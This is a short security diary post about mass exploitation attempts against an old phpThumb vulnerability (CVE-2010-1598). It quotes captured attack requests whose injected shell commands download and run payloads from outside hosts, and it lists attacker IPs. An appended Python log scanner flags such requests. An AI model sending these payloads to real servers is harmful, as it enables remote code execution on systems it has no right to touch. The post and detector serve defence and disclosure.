22 December 2011

New attempts to exploit old phpthumb vulnerabilities

After several weeks of heavy scanning for awstats vulnerabilities that reminded us of the importance of patching, followed by some scanners trying to exploit phpAlbum vulnerabilities, we have now seen thousands of attempts to exploit a phpthumb vulnerability first reported by Secunia in April 2010 as CVE-2010-1598. (Hey, give these guys some credit… they started out using the awstats vulnerability that was first discovered in 2006… maybe we should call this progress?)

The advisory states that the vulnerability applies to phpthumb versions <= 1.7.9. The current version is 1.7.11 and is available for download here. If you are using phpthumb, upgrade to the latest version to avoid becoming a victim.

The requests I have seen are typically as follows:

GET /admin/phpthumb/phpthumb.php?fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; & src=file.jpg & phpThumbDebug=9

GET /lib/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; & phpThumbDebug=9  

IPs seen today were as follows:

91.121.61.223
202.131.87.70
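As an added illustration that is not part of the diary, the following Python scans Apache-style access-log lines for the request shape quoted above: fltr[] values that stray from phpThumb's plain name|parameter form, plus the presence of the phpThumbDebug parameter. The log lines, IPs and paths are constructed placeholders, and the allowlist regex for legitimate filter syntax is an assumption modelled on the blur|9 prefix in the quoted requests.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Common Log Format: client IP, identd, user, [timestamp], "request line", status, bytes.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b')

# Allowlist for a phpThumb filter spec: a filter name plus |-separated simple
# parameters such as "blur|9" (assumption modelled on the blur|9 prefix above).
SAFE_FILTER_RE = re.compile(r'^[A-Za-z]+(\|[A-Za-z0-9_./-]*)*$')

# Constructed sample log; IPs are TEST-NET placeholders, not values from the diary.
SAMPLE_LOG = """\
192.0.2.10 - - [22/Dec/2011:10:01:02 +0000] "GET /admin/phpthumb/phpthumb.php?fltr[]=blur|9%20;%20wget%20-O%20/tmp/f%20203.0.113.5/f;&src=file.jpg&phpThumbDebug=9 HTTP/1.1" 200 512
192.0.2.11 - - [22/Dec/2011:10:02:07 +0000] "GET /lib/phpthumb/phpthumb.php?src=photo.jpg&fltr[]=blur|3&w=200 HTTP/1.1" 200 8192
192.0.2.12 - - [22/Dec/2011:10:03:15 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048
192.0.2.13 - - [22/Dec/2011:10:04:41 +0000] "GET /lib/phpthumb/phpthumb.php?src=photo.jpg&phpThumbDebug=9 HTTP/1.1" 200 300
"""

def parse_query(query):
    # Split on '&' only: ';' is part of the injected payload, never a separator here.
    params = {}
    for pair in filter(None, query.split('&')):
        key, _, value = pair.partition('=')
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def inspect_request(target):
    # Return the reasons a request target looks like a phpThumb fltr[] injection.
    parts = urlsplit(target)
    if not parts.path.lower().endswith('phpthumb.php'):
        return []
    params = parse_query(parts.query)
    reasons = []
    for value in params.get('fltr[]', []) + params.get('fltr', []):
        if not SAFE_FILTER_RE.match(value):
            reasons.append('fltr value outside the name|param form: %r' % value[:60])
    if 'phpThumbDebug' in params:
        reasons.append('phpThumbDebug parameter present, as in the quoted requests')
    return reasons

def scan_log(text):
    # Return (ip, target, reasons) for every log line that triggers at least one reason.
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        reasons = inspect_request(m.group('target')) if m else []
        if reasons:
            hits.append((m.group('ip'), m.group('target'), reasons))
    return hits
```

Running scan_log(SAMPLE_LOG) flags the first line on both counts and the last line on the debug parameter alone, while the benign blur|3 thumbnail request is left untouched.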